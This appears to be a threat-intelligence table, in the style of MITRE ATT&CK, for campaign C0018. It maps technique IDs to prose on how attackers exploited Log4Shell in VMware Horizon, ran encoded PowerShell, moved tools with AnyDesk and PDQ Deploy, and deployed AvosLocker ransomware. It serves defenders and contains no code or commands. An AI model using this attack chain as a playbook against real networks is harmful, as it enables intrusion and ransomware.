| enterprise |
T1071 |
Application Layer Protocol |
- |
| enterprise |
T1071.001 |
Web Protocols |
During C0018, the threat actors used HTTP for C2 communications. |
| enterprise |
T1059 |
Command and Scripting Interpreter |
- |
| enterprise |
T1059.001 |
PowerShell |
During C0018, the threat actors used encoded PowerShell scripts for execution. |
| enterprise |
T1486 |
Data Encrypted for Impact |
During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network. |
| enterprise |
T1190 |
Exploit Public-Facing Application |
During C0018, the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. |
| enterprise |
T1105 |
Ingress Tool Transfer |
During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network. |
| enterprise |
T1570 |
Lateral Tool Transfer |
During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy. |
| enterprise |
T1036 |
Masquerading |
During C0018, AvosLocker was disguised using the victim company name as the filename. |
| enterprise |
T1036.005 |
Match Legitimate Name or Location |
For C0018, the threat actors renamed a Sliver payload to vmware_kb.exe. |
| enterprise |
T1046 |
Network Service Discovery |
During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning. |
| enterprise |
T1571 |
Non-Standard Port |
During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections. |
| enterprise |
T1027 |
Obfuscated Files or Information |
- |
| enterprise |
T1027.010 |
Command Obfuscation |
During C0018, the threat actors used Base64 to encode their PowerShell scripts. |
| enterprise |
T1588 |
Obtain Capabilities |
- |
| enterprise |
T1588.002 |
Tool |
For C0018, the threat actors acquired a variety of open source tools, including Mimikatz, Sliver, SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy. |
| enterprise |
T1219 |
Remote Access Software |
During C0018, the threat actors used AnyDesk to transfer tools between systems. |
| enterprise |
T1021 |
Remote Services |
- |
| enterprise |
T1021.001 |
Remote Desktop Protocol |
During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892. |
| enterprise |
T1072 |
Software Deployment Tools |
During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network. |
| enterprise |
T1218 |
System Binary Proxy Execution |
- |
| enterprise |
T1218.011 |
Rundll32 |
During C0018, the threat actors used rundll32 to run Mimikatz. |
| enterprise |
T1016 |
System Network Configuration Discovery |
During C0018, the threat actors ran nslookup and Advanced IP Scanner on the target network. |
| enterprise |
T1033 |
System Owner/User Discovery |
During C0018, the threat actors collected whoami information via PowerShell scripts. |
| enterprise |
T1047 |
Windows Management Instrumentation |
During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (wmiprvse.exe) to execute a variety of encoded PowerShell scripts using the DownloadString method. |